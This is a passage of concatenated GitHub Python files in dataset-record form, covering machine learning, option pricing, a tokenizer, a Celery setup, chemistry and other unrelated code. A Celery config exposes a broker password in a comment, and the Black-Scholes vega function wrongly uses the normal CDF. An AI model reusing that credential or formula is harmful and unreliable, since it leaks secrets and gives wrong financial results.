y, parameters=True):\n if parameters:\n if self.n_classes is None:\n self.n_classes = np.max(y) + 1\n self.n_features = X.shape[1]\n self.b, self.w = self.init_parameters(\n weights_shape=(self.n_features, self.n_classes),\n bias_shape=(self.n_classes,),\n random_seed=self.random_seed)\n self.cost_ = []\n\n y_encoding = self.one_hot_encoding(y = y, n_labels=self.n_classes, dtype=np.float)\n\n for i in range(self.epochs):\n for idx in self.yield_batches_idx(\n n_batches=self.batches,\n data_array=y,\n shuffle=True):\n #the size of weight is number of features * number of classes and bias is number of classes\n \n net = self.Input(X[idx], self.w, self.b)\n softmax = self.Softmax(net)\n differential = softmax - y_encoding[idx]\n mse = np.mean(differential, axis=0)\n gradient = np.dot(X[idx].T, differential)\n \n self.w -= (self.learningrate * gradient +\n self.learningrate * self.l2_regula * self.w)\n self.b -= (self.learningrate * np.sum(differential, axis=0))\n\n # compute the cost\n net = self.Input(X, self.w, self.b)\n softmax = self.Softmax(net)\n cross_entropy = self.Cross_entropy(output=softmax, y_target=y_encoding)\n cost = self.Cost(cross_entropy)\n self.cost_.append(cost)\n return self\n\n def Fit_Data(self, X, y, parameters=True):\n\n if self.random_seed is not None:\n np.random.seed(self.random_seed)\n self.fiting(X=X, y=y, parameters=parameters)\n self.fitted = True\n return self\n \n \n def _predict(self, X):\n probability = self.predicted_probability(X)\n return self.to_classlabels(probability)\n \n def predict(self, X):\n if not self.fitted:\n raise AttributeError('The Model is not fit!')\n return self._predict(X)\n\n def predicted_probability(self, X):\n \n net = self.Input(X, self.w, self.b)\n softmax = self.Softmax(net)\n return softmax\n\n def Input(self, X, W, b):\n return (X.dot(W) + b)\n\n def Softmax(self, z):\n return (np.exp(z.T) / np.sum(np.exp(z), axis=1)).T\n\n def Cross_entropy(self, output, y_target):\n return - np.sum(np.log(output) * (y_target), axis=1)\n\n def Cost(self, cross_entropy):\n L2_term = self.l2_regula * np.sum(self.w ** 2)\n cross_entropy = cross_entropy + L2_term\n return 0.5 * np.mean(cross_entropy)\n\n def to_classlabels(self, z):\n return z.argmax(axis=1)\n \n def init_parameters(self, weights_shape, bias_shape=(1,), dtype='float64',\n scale=0.01, random_seed=None):\n \n if random_seed:\n np.random.seed(random_seed)\n w = np.random.normal(loc=0.0, scale=scale, size=weights_shape)\n b = np.zeros(shape=bias_shape)\n return b.astype(dtype), w.astype(dtype)\n \n def one_hot_encoding(self, y, n_labels, dtype):\n \n oneh = np.zeros((len(y), n_labels))\n for i, val in enumerate(y):\n oneh[i, val] = 1\n return oneh.astype(dtype) \n \n def yield_batches_idx(self, n_batches, data_array, shuffle=True):\n indices = np.arange(data_array.shape[0])\n if shuffle:\n indices = np.random.permutation(indices)\n if n_batches > 1:\n remainder = data_array.shape[0] % n_batches\n if remainder:\n minis = np.array_split(indices[:-remainder], n_batches)\n minis[-1] = np.concatenate((minis[-1],\n indices[-remainder:]),\n axis=0)\n else:\n minis = np.array_split(indices, n_batches)\n\n else:\n minis = (indices,)\n\n for idx_batch in minis:\n yield idx_batch\n \n def shuffle_arrays(self, arrays):\n \n sh = np.random.permutation(len(arrays[0]))\n return [ary[sh] for ary in arrays]\n\nX, y = iris_data()\n#Petal length and petal width\nX = X[:, 2 : ] \n# standardize\nX[:,0] = (X[:,0] - X[:,0].mean()) / X[:,0].std()\nX[:,1] = (X[:,1] - X[:,1].mean()) / X[:,1].std()\nMNR_S = MNR2(learningrate=0.01, epochs=10, batches=1, random_seed=0)\nMNR_S.Fit_Data(X, y)\nplot_decision_regions(X, y, clf=MNR_S)\nplt.title('MNR by considering GD')\nplt.show()\nplt.plot(range(len(MNR_S.cost_)), MNR_S.cost_)\nplt.xlabel('Iterations')\nplt.ylabel('Cost')\nplt.show()\n\n\n\n#For another 500 epochs I continue training by considering parameters is False\n\n\n\nMNR_S.epochs = 500\nMNR_S.Fit_Data(X, y, parameters=False)\n\nplot_decision_regions(X, y, clf=MNR_S)\nplt.title('MNR by considering SGD')\nplt.show()\nplt.plot(range(len(MNR_S.cost_)), MNR_S.cost_)\nplt.xlabel('Iterations')\nplt.ylabel('Cost')\nplt.show()\n\n\n\ny_predicted = MNR_S.predict(X)\ny_pred = MNR_S.predicted_probability(X)\nprint('Last 3 Class Labels: %s' % y_predicted[-3:])\nprint('Last 3 Class Labels:\\n %s' % y_pred[-3:])\n\n\n\n\n\n\n","repo_name":"NedaKeivan/Pattern-Recognition-MNR-","sub_path":"MNR-ICP_pythonCode.py","file_name":"MNR-ICP_pythonCode.py","file_ext":"py","file_size_in_byte":11663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14932257862","text":"\"\"\"\nPythonista3 app to learn WebGL\n\"\"\"\n\nimport wk.wkwebview as wkwebview\nimport ui\nimport pathlib\n\nuri = pathlib.Path('./index.html')\n\n\nclass View(ui.View):\n def __init__(self):\n self.wv = wkwebview.WKWebView(flex='WH')\n self.wv.load_url(str(uri))\n self.add_subview(self.wv)\n\n def will_close(self):\n self.wv.clear_cache()\n\n\n_view = View()\n_view.present(style='fullscreen', orientations=['portrait'])\n\n","repo_name":"pome-ta/webgl_learning-Pythonista","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37713133593","text":"import numpy as np\nimport pandas as pd\nimport pyarrow as pa\n\nfrom parquery.transport import (\n serialize_df,\n deserialize_df,\n serialize_pa_table,\n deserialize_pa_table\n)\n\ndef test_pa_serialization():\n iterable = ((x, x) for x in range(20000))\n data = np.fromiter(iterable, dtype='i8,i8')\n df = pd.DataFrame(data)\n\n data_table = pa.Table.from_pandas(df, preserve_index=False)\n buf = serialize_pa_table(data_table)\n data_table_2 = deserialize_pa_table(buf)\n\n assert data_table == data_table_2\n\n\ndef test_serialization():\n df = pd.DataFrame({'A': [1, 2], 'B': [3, 4]})\n\n parquery_encoded = serialize_df(df)\n assert isinstance(parquery_encoded, pa.Buffer)\n\n deserialized_parquery_df = deserialize_df(parquery_encoded)\n assert df.to_dict() == deserialized_parquery_df.to_dict()\n","repo_name":"visualfabriq/parquery","sub_path":"tests/test_serialization.py","file_name":"test_serialization.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"2467518785","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 27 14:12:33 2019\r\n\r\n@author: admin\r\n\"\"\"\r\n\r\nfrom math import log,sqrt,exp\r\nfrom scipy import stats\r\nfrom random import gauss,seed\r\nfrom time import time\r\n\r\ndef bs_call_value(S0,K,T,r,sigma):\r\n s0 = float(S0)\r\n d1 = (log(s0/K) + (r + sigma*sigma*0.5)*T)/(sigma*sqrt(T))\r\n d2 = (log(s0/K) + (r - sigma*sigma*0.5)*T)/(sigma*sqrt(T))\r\n value = s0 * stats.norm.cdf(d1,0.0,1.0) - K * exp(-r*T)*stats.norm.cdf(d2,0.0,1)\r\n return value\r\n\r\ndef bs_vega(S0,K,T,r,sigma):\r\n s0 = float(S0)\r\n d1 = ((log(s0/K) + (r + 0.5*sigma*sigma)*T))/(sigma*sqrt(T))\r\n vega = s0 * stats.norm.cdf(d1,0.0,1.0)*sqrt(T)\r\n return vega\r\n\r\ndef bs_call_imp_vol(S0,K,T,r,C0,sigma_est,it=100):\r\n '''Implied volatility of European call option in BS model.\r\n Parameters\r\n =============\r\n S0 : float\r\n initaial stock/index/ level\r\n K : float\r\n Strike price\r\n T : float\r\n maturity date( in year fractions)\r\n r : float \r\n constant risk-free short rate\r\n sigma_est : float\r\n estimate of impl . volatility\r\n it : integer\r\n number of iterations\r\n \r\n Returns\r\n ==============\r\n simga_est : float\r\n numerically estimated implied volatility\r\n '''\r\n \r\n for i in range(it):\r\n sigma_est -= ((bs_call_value(S0,K,T,r,sigma_est) - C0) / bs_vega(S0,K,T,r,sigma_est))\r\n return sigma_est\r\n\r\ndef monte_carlo_valuation():\r\n seed(20000)\r\n t0 = time()\r\n \r\n S0 = 2.982\r\n K = 2.7\r\n T = 0.08333\r\n r = 0.03\r\n sigma = 0.1374\r\n M = 50\r\n dt = T/M\r\n I = 250000\r\n S = []\r\n \r\n for i in range(I):\r\n path = []\r\n for t in range(M + 1):\r\n if t == 0:\r\n path.append(S0)\r\n else:\r\n z = gauss(0.0,1.0)\r\n St = path[t - 1] * exp((r - 0.5*sigma*sigma) * dt + sigma *sqrt(dt) *z)\r\n path.append(St)\r\n S.append(path)\r\n \r\n C0 = exp(-r*T)*sum([max(path[-1] - K,0) for path in S]) / I\r\n tpy = time() - t0\r\n print( \"European Option Value %7.3f\" % C0)\r\n print(\"Duration in Seconds %7.3f\" % tpy)\r\n \r\n\r\nif __name__ == '__main__':\r\n print(\"bs option function : \" + str(bs_call_value(2.982,2.7,0.083333,0.03,0.1374)))\r\n monte_carlo_valuation()","repo_name":"whut-aaron/python-scripts","sub_path":"bs_option.py","file_name":"bs_option.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42363524712","text":"#!/usr/bin/env python3\n\nfrom functools import reduce\n\nKEYWORD = 0\nSYMBOL = 1\nIDENTIFIER = 2\nINT_CONST = 3\nSTRING_CONST = 4\n\nKEYWORDS = ('class', 'constructor', 'function', 'method', 'field',\n 'static', 'var', 'int', 'char', 'boolean', 'void', 'true', 'false',\n 'null', 'this', 'let', 'do', 'if', 'else', 'while', 'return')\nSYMBOLS = ('{', '}', '(', ')', '[', ']', '.', ',', ';', '+',\n '-', '*', '/', '&', '|', '<', '>', '=', '~')\n\nclass JackTokenizer(object):\n \"\"\" JackTokenizer removes all comments and white space from the input\n stream and breaks it onto Jack language tokens, as specified by the Jack\n grammar.\n \"\"\"\n\n _dec_file_ptr = lambda self, num: self.file.seek(self.file.tell()-num)\n\n def __init__(self, file):\n \"\"\" is doc really needed? pff \"\"\"\n self.file = file\n \n def _group_until(self, identifier):\n \"\"\" \n # skips the file characters until identifier is found\n # returns the whole thing\n # returns False if EOF reached\n \"\"\"\n\n stretch = ''\n char = self.file.read(len(identifier))\n while char: # while not EOF\n if char == identifier:\n stretch += char\n return stretch\n stretch += char[0]\n self._dec_file_ptr(len(identifier)-1)\n char = self.file.read(len(identifier))\n return False\n\n def _group_until_logic(self, function, size=1):\n \"\"\"\n # groups the file characters until function(chars) is true\n # another version of _group_until using a function\n # returns False if EOF reached\n \"\"\"\n\n stretch = ''\n char = self.file.read(size)\n while char: # while not EOF\n if function(char):\n self._dec_file_ptr(size)\n return stretch\n stretch += char[0]\n self._dec_file_ptr(size-1)\n char = self.file.read(size)\n return False\n\n def hasMoreTokens(self):\n \"\"\" Do we have more tokens in the input? \"\"\"\n \n saved_pointer = self.file.tell() \n while True:\n char = self.file.read(1)\n if not char:\n return False # EOF reached\n if char.isspace():\n continue\n if char == '/':\n char2 = self.file.read(1)\n if char2 in ('*','/'): # comments ahead\n if char2 == '*':\n # loop until '*/'\n self._group_until('*/')\n elif char2 == '/':\n # loop until '\\n'\n self._group_until('\\n')\n continue\n self.file.seek(saved_pointer)\n return True\n\n def advance(self):\n \"\"\" Gets the next token from the input and makes it the current token.\n This method should only be called if hasMoreTokens() is true. Initially\n there is no current token.\n The whole program advancing logic will be built upon the file buffer\n pointers. (self.file.tell() and self.file.seek(int ptr))\n \"\"\"\n \n while True:\n c = self.file.read(1)\n \n if not c:\n return False # EOF reached\n if c.isspace():\n continue # skip space-like characters\n elif c == '/':\n c2 = self.file.read(1)\n if c2 in ('*','/'): # comment found\n self._dec_file_ptr(2)\n if c2 == '*':\n comment = self._group_until('*/')\n elif c2 == '/':\n comment = self._group_until('\\n')\n print(\"comment: %s\" % comment.strip())\n continue\n self._dec_file_ptr(1) # no comments, put c2 back into buffer\n \n # if character pass over this point, is part of valid token\n if c == '\"': # start of a string constant\n token = '\"'+self._group_until('\"')\n elif c.isdigit(): # start of a number\n self._dec_file_ptr(1)\n token = self._group_until_logic(lambda c: not c.isdigit())\n elif c.isalpha(): # start of a keyword\n self._dec_file_ptr(1)\n token = self._group_until_logic(lambda char: not char.isalpha())\n else: # single length token\n token = c\n\n self.current_token = token\n self._setTokenType()\n return self.current_token\n raise Exception(\"no tokens left\")\n\n\n def _setTokenType(self):\n \"\"\" Returns the type of the current token.\n may return:\n KEYWORD, \n SYMBOL, \n IDENTIFIER, \n INT_CONST, \n STRING_CONST,\n \"\"\"\n\n checkType = {\n KEYWORD: lambda token: token in KEYWORDS,\n SYMBOL: lambda token: token in SYMBOLS,\n INT_CONST: lambda token: token.isalnum(),\n STRING_CONST: lambda token: token[0]+token[-1] == '\"\"',\n IDENTIFIER: lambda token: token not in KEYWORDS and not\n token[0].isdigit() and reduce(lambda x, y: x and y,\n map(lambda c: c.isdigit() or c.isalpha() or (c is '_'),\n token))\n }\n\n for token_type in checkType:\n if checkType[token_type](self.current_token):\n self.token_type = token_type\n return self.token_type\n raise Exception(\"no types matched.\", self.current_token)\n return False\n\n\n","repo_name":"felipap/teocs","sub_path":"projects/chap11/jacktokenizer.py","file_name":"jacktokenizer.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"13607884886","text":"__author__ = 'v-rewei'\n\nimport DAO.SqlServerDAO\nimport datetime\n\nclass BatchRunSqlDAO:\n def RunBatch(self, slist, sql, who):\n if not sql or not slist or len(slist) == 0 or str(sql).strip == '':\n return \"Parameters Null Exception\"\n else:\n sql = str(sql).strip()\n self.LogBatchStart(who, sql)\n extmsg = ''\n for s in slist:\n self.LogSqlStart(s)\n dao = DAO.SqlServerDAO.SqlServerDAO(s)\n c = None\n try:\n dao.connect()\n c = dao.conn.cursor()\n c.execute(sql)\n dao.conn.commit()\n extmsg += s + \" :Success\\n\"\n except Exception as ext:\n extmsg += s + \" :Fail\\n Exception Message:\" + ext.message\n self.LogException(ext.message)\n break\n finally:\n if c:\n c.close()\n if dao:\n dao.closeconnect()\n self.LogBatchEnd()\n return extmsg\n\n def LogBatchStart(self, who, sql):\n with open(\"batchlog.log\", mode='a+') as f:\n f.write('\\n')\n s = self.FormatSplteline()\n f.write(s)\n f.write('\\n')\n f.write('Batch Start')\n f.write('\\n')\n f.write('Alias: ' + who)\n f.write('\\n')\n f.write(str(sql).replace('\\r\\n', '\\n'))\n f.write('\\n')\n\n def LogSqlStart(self, connstr):\n with open(\"batchlog.log\", mode='a+') as f:\n f.write('\\n')\n f.write(connstr)\n\n def LogException(self, message):\n with open(\"batchlog.log\", mode='a+') as f:\n f.write('\\n')\n f.write('Exception: \\n');\n f.write(message.replace('\\r\\n', '\\n'))\n\n def LogBatchEnd(self):\n with open(\"batchlog.log\", mode='a+') as f:\n f.write('\\n');\n f.write('Batch End')\n f.write('\\n')\n s = self.FormatSplteline()\n f.write(s)\n f.write('\\n')\n f.write('\\n')\n f.write('\\n')\n\n def FormatSplteline(self):\n s = ''.join(['=']*40)\n s += datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')\n s += ''.join(['=']*40)\n return s\n","repo_name":"rav009/Data-Vertifier","sub_path":"Data Vertifier/DAO/BatchRunSqlDAO.py","file_name":"BatchRunSqlDAO.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20472119185","text":"#!/usr/bin/env python3\nimport socket\n\ns=socket.socket()\nhost='192.168.56.1'\nport=int(input(\"Enter the PORT:\"))\n\ns.connect((host,port))\nwhile True:\n\tdata =str(s.recv(1024)).strip('b').strip('\\'')\n\tprint(data)\n\tmsg=bytes(\"reciever >>> \"+input(r\"\"),encoding='utf-8')\n\ts.send(msg)\n","repo_name":"vishnusoni2780/C-S-Box-Python-Project","sub_path":"rchat.py","file_name":"rchat.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12885211009","text":"from imgtools.svg import Svg\nfrom argparse import ArgumentParser\n\n\ndef main():\n args = get_args()\n svgs = [Svg(f) for f in args.images]\n desired_size = min([i.__dict__[args.dimension] for i in svgs])\n if args.dimension == \"width\":\n [i.scale_width_to_reference(desired_size) for i in svgs]\n else:\n [i.scale_height_to_reference(desired_size) for i in svgs]\n save_all(svgs)\n\n\ndef save_all(svgs):\n for s in svgs:\n s.save(s.file.replace('.svg', '') + \"_resized\" + \".svg\")\n\n\ndef get_args():\n parser = ArgumentParser(description=\"Make svg images the same size in one dimension.\")\n general = parser.add_argument_group(title='General options')\n general.add_argument(\"-i\", \"--images\",\n help=\"images to change size of.\",\n nargs='+',\n metavar=\"files\",\n required=True)\n general.add_argument(\"-d\", \"--dimension\",\n choices=['width', 'height'],\n help=\"Which dimension to use.\",\n default='width')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wdecoster/combine_images","sub_path":"imgtools/same_size_svg.py","file_name":"same_size_svg.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34585059030","text":"#! python3\n# downloadXkcd - downloads every XKCD comic\n\nimport logging, os, bs4, requests\n\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\n#logging.disable(logging.CRITICAL)\n\nurl = 'http://www.xkcd.com'\nos.makedirs('xkcd', exist_ok=True)\n\nwhile not url.endswith('#'):\n # download page\n print('Downloading page %s...' % url)\n res = requests.get(url)\n res.raise_for_status()\n\n soup = bs4.BeautifulSoup(res.text, 'html.parser')\n # find url of comic image\n comicElem = soup.select('#comic img')\n if comicElem is []:\n print('Could not find the image.')\n\n else:\n logging.debug(url)\n try:\n comicUrl = comicElem[0].get('src')\n comicUrl=\"http:\"+comicUrl\n if 'xkcd' not in comicUrl:\n comicUrl=comicUrl[:7]+'xkcd.com/'+comicUrl[7:]\n # download image\n print('Downloading image %s...' % comicUrl)\n res = requests.get(comicUrl)\n res.raise_for_status()\n\n except requests.exceptions.MissingSchema:\n prevLink = soup.select('a[rel=\"prev\"]')[0]\n url = 'http://xkcd.com' + prevLink.get('href')\n continue\n\n # save the image to ./xkcd\n imageFile = open(os.path.join('xkcd', os.path.basename(comicUrl)), 'wb')\n for chunk in res.iter_content(100000):\n imageFile.write(chunk)\n imageFile.close()\n\n # get the prev button url\n prevLink = soup.select('a[rel=\"prev\"]')[0]\n url = 'http://xkcd.com' + prevLink.get('href')\n\nprint('Done.')\n","repo_name":"Atropos148/AutomateTheBoringStuff","sub_path":"dowloadXkcd.py","file_name":"dowloadXkcd.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13502826751","text":"import argparse\nimport json\n\nimport sys\nfrom typing import List, Any\n\nimport sinter\nfrom sinter._csv_out import CSV_HEADER\nfrom sinter._existing_data import ExistingData\nfrom sinter._plotting import better_sorted_str_terms\n\n\ndef main_combine(*, command_line_args: List[str]):\n parser = argparse.ArgumentParser()\n parser.add_argument('--order',\n choices=('preserve', 'metadata', 'error'),\n default='metadata',\n help='Determines the order of output rows.\\n'\n ' metadata (default): sort ascending by metadata.'\n ' preserve: match order of input rows.\\n'\n ' error: sort ascending by error rate')\n parser.add_argument('rest',\n nargs=argparse.REMAINDER,\n type=str,\n help='Paths to CSV files containing sample statistics.')\n args = parser.parse_args(command_line_args)\n\n if args.rest:\n total = ExistingData()\n for path in args.rest:\n total += ExistingData.from_file(path)\n else:\n total = ExistingData.from_file(sys.stdin)\n\n if args.order == 'metadata':\n output = sorted(total.data.values(), key=lambda e: better_sorted_str_terms(json.dumps(e.json_metadata, separators=(',', ':'), sort_keys=True)))\n elif args.order == 'preserve':\n output = list(total.data.values())\n elif args.order == 'error':\n def err_rate_key(stats: sinter.TaskStats) -> Any:\n num_kept = stats.shots - stats.discards\n err_rate = 0 if num_kept == 0 else stats.errors / num_kept\n discard_rate = 0 if stats.shots == 0 else stats.discards / stats.shots\n return err_rate, discard_rate\n output = sorted(total.data.values(), key=err_rate_key)\n else:\n raise NotImplementedError(f'order={args.order}')\n\n print(CSV_HEADER)\n for value in output:\n print(value.to_csv_line())\n","repo_name":"Qcatty/Stim","sub_path":"glue/sample/src/sinter/_main_combine.py","file_name":"_main_combine.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"6379749876","text":"import subprocess\nimport os\nimport locale\nfrom termcolor import colored\nimport settings\nfrom colorama import init\n\ninit()\n\nos.environ['OPENSSL_CONF'] = './openssl.cnf'\n\nencoding = locale.getdefaultlocale()[1]\n\nOPENSSL_OUTPUT_COLOR = 'magenta'\n\n# Create openssl.cnf file\nimport jinja\ntemplate = jinja.from_string(open('openssl.cnf.template').read())\ncnf = template.render(BEE2EVP_ENGINE_LIBRARY_PATH=settings.BEE2EVP_ENGINE_LIBRARY_PATH)\ncnf_file = open('openssl.cnf', 'w')\ncnf_file.write(cnf)\ncnf_file.close()\n#########################\n\n\ndef openssl_call(cmd):\n\n print(colored('openssl ' + cmd, 'green'))\n p = subprocess.Popen(settings.OPENSSL_EXE_PATH + ' ' + cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n stdin=subprocess.PIPE,\n shell=True)\n out, err_out = p.communicate()\n\n retcode = p.poll()\n if retcode:\n err_out = err_out.decode(encoding)\n print(colored(err_out, 'red', 'on_grey'))\n raise RuntimeError('Openssl call fails with status %s' % retcode)\n out = out.decode(encoding)\n print(colored(out, OPENSSL_OUTPUT_COLOR))\n return out\n","repo_name":"ppmi-bsu/btsl_test","sub_path":"openssl.py","file_name":"openssl.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37702664018","text":"\ndef score(your_decision, opponent_decision, loses_to, correspondance):\n opp_numeric = correspondance[opponent_decision]\n yours_numeric = correspondance[your_decision]\n result = 0\n if (yours_numeric == opp_numeric): result = 3\n elif(loses_to[your_decision] != opponent_decision): result = 6\n return yours_numeric + result \n\nloses_to = {\n 'X': 'B',\n 'Y': 'C',\n 'Z': 'A',\n}\n\ncorrespondance = {\n 'A': 1,\n 'B': 2,\n 'C': 3,\n 'X': 1,\n 'Y': 2,\n 'Z': 3,\n}\n\nfilename = 'own_input'\nlines = open(filename).read().split('\\n')\nplays = [x.split(' ') for x in lines]\n\nprint(sum([score(play[1], play[0], loses_to, correspondance) for play in plays]))\n\n","repo_name":"Ale-PerazaGlez/AOC22","sub_path":"Day 2/day_2_star_1.py","file_name":"day_2_star_1.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5068885980","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport collections\nimport itertools\nimport sys\n\nfrom oslo_config import cfg\nfrom oslo_log import log\n\nfrom heat.common import plugin_loader\n\nLOG = log.getLogger(__name__)\n\n\nclass PluginManager(object):\n \"\"\"A class for managing plugin modules.\"\"\"\n\n def __init__(self, *extra_packages):\n \"\"\"Initialise the Heat Engine plugin package, and any others.\n\n The heat.engine.plugins package is always created, if it does not\n exist, from the plugin directories specified in the config file, and\n searched for modules. In addition, any extra packages specified are\n also searched for modules. e.g.\n\n >>> PluginManager('heat.engine.resources')\n\n will load all modules in the heat.engine.resources package as well as\n any user-supplied plugin modules.\n \"\"\"\n def packages():\n for package_name in extra_packages:\n yield sys.modules[package_name]\n\n cfg.CONF.import_opt('plugin_dirs', 'heat.common.config')\n yield plugin_loader.create_subpackage(cfg.CONF.plugin_dirs,\n 'heat.engine')\n\n def modules():\n pkg_modules = map(plugin_loader.load_modules, packages())\n return itertools.chain.from_iterable(pkg_modules)\n\n self.modules = list(modules())\n\n def map_to_modules(self, function):\n \"\"\"Iterate over the results of calling a function on every module.\"\"\"\n return map(function, self.modules)\n\n\nclass PluginMapping(object):\n \"\"\"A class for managing plugin mappings.\"\"\"\n\n def __init__(self, names, *args, **kwargs):\n \"\"\"Initialise with the mapping name(s) and arguments.\n\n `names` can be a single name or a list of names. The first name found\n in a given module is the one used. Each module is searched for a\n function called _mapping() which is called to retrieve the\n mappings provided by that module. Any other arguments passed will be\n passed to the mapping functions.\n \"\"\"\n if isinstance(names, str):\n names = [names]\n\n self.names = ['%s_mapping' % name for name in names]\n self.args = args\n self.kwargs = kwargs\n\n def load_from_module(self, module):\n \"\"\"Return the mapping specified in the given module.\n\n If no such mapping is specified, an empty dictionary is returned.\n \"\"\"\n for mapping_name in self.names:\n mapping_func = getattr(module, mapping_name, None)\n if callable(mapping_func):\n fmt_data = {'mapping_name': mapping_name, 'module': module}\n try:\n mapping_dict = mapping_func(*self.args, **self.kwargs)\n except Exception:\n LOG.error('Failed to load %(mapping_name)s '\n 'from %(module)s', fmt_data)\n raise\n else:\n if isinstance(mapping_dict, collections.abc.Mapping):\n return mapping_dict\n elif mapping_dict is not None:\n LOG.error('Invalid type for %(mapping_name)s '\n 'from %(module)s', fmt_data)\n\n return {}\n\n def load_all(self, plugin_manager):\n \"\"\"Iterate over the mappings from all modules in the plugin manager.\n\n Mappings are returned as a list of (key, value) tuples.\n \"\"\"\n mod_dicts = plugin_manager.map_to_modules(self.load_from_module)\n return itertools.chain.from_iterable(d.items() for d\n in mod_dicts)\n","repo_name":"openstack/heat","sub_path":"heat/engine/plugin_manager.py","file_name":"plugin_manager.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":385,"dataset":"github-code","pt":"27"} +{"seq_id":"11983703135","text":"#!C:/Python27/ArcGIS10.2/python.exe\n#-*- coding:utf-8 -*-\n\"\"\"\n#============================================\n#\n# Project: mycelery\n# Name: The file name is celeryconfig\n# Purpose: \n# Auther: Administrator\n# Tel: 17372796660\n#\n#============================================\n#\n\"\"\"\nimport os\n\n#BORKER_URL='amqp://admin:Lantucx2018@localhost:5672/admin-vhost'\nBROKER_URL = 'amqp://guest:guest@localhost:5672//'\n\nCELERY_RESULT_BACKEND ='amqp://'\n\nCELERY_TIMEZONE='Asiz/Shanghai'\n\n\nCELERY_QUEUES={\n 'clip_tasks':{\n 'exchange':'clip_tasks',\n 'exchange_type':'direct',\n 'binding_key':'clip_tasks'\n },\n 'other_tasks': {\n 'exchange': 'other_tasks',\n 'exchange_type': 'direct',\n 'binding_key': 'other_tasks'\n }\n}\n\nCELERY_DEFAULT_QUEUE='clip_tasks'\n\nCELERY_IMPORTS=(\n 'celery_app.clipfromsde',\n)\n\n#防止死锁\nCELERY_FORCE_EXECV=True\n\n#允许重试\nCELERY_ACKS_LATE=True\n\n#设置并发worker数量\nCELERY_CONCURRENCY=2\n\n#每个worker最多执行100个任务被销毁\nCELERY_MAX_TASKS_PER_CHILD=100\n\n","repo_name":"176177082/RGSManageV3","sub_path":"celery_app/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28883609405","text":"import numpy as np\n\n\ndef mp2(hamiltonian, orbs, orbe, nocc, nvirt, verbose=False):\n ints = hamiltonian.i2\n moints = ints.transform_mp2(orbs, nocc)\n Evirt, Eocc = orbe[nocc:], orbe[:nocc]\n\n denominator = 1/(Eocc.reshape(-1, 1, 1, 1) - Evirt.reshape(1, -1, 1, 1) +\n Eocc.reshape(1, 1, -1, 1) - Evirt.reshape(1, 1, 1, -1))\n\n MP2corr_OS = np.einsum('iajb,iajb,iajb->', moints, moints, denominator)\n MP2corr_SS = np.einsum('iajb,iajb,iajb->', moints - moints.swapaxes(1,3), moints, denominator)\n return MP2corr_OS + MP2corr_SS\n\n\nif __name__ == '__main__': test_mp2()\n","repo_name":"Konjkov/pyquante2","sub_path":"pyquante2/pt/mp2.py","file_name":"mp2.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"29648534933","text":"from ete3 import Tree\nimport numpy as np\n\ndef createTreeRepresentation(t):\n i = 0\n for node in [n for n in t.traverse()][::-1]:\n node.add_feature('label', str(i))\n #node.name = str(i)\n i += 1\n\n g = np.zeros((i,i))\n for node in [n for n in t.traverse()][::-1]:\n if node.children == []:\n pos = int(node.label)\n g[pos][pos] = 1\n else:\n lchild = g[int(node.children[0].label)]\n rchild = g[int(node.children[1].label)]\n me = int(node.label)\n for k in range(len(g[0])):\n g[me][k] = max(lchild[k], rchild[k])\n g[me][me] = 1\n\n return g\n\ndef createDistMatrix(host):\n size = len([node for node in host.traverse()])\n d = np.zeros((size, size), dtype=int)\n for a in host.traverse():\n for b in host.traverse():\n i, j = int(a.label), int(b.label)\n if i < j:\n d[i][j] = a.get_distance(b, topology_only=True)\n elif i > j:\n d[i][j] = b.get_distance(a, topology_only=True)\n else:\n d[i][j] = 0\n return d\n\ndef createMapping(mapping):\n newmap = {}\n for node in mapping:\n newmap[int(node.label)] = 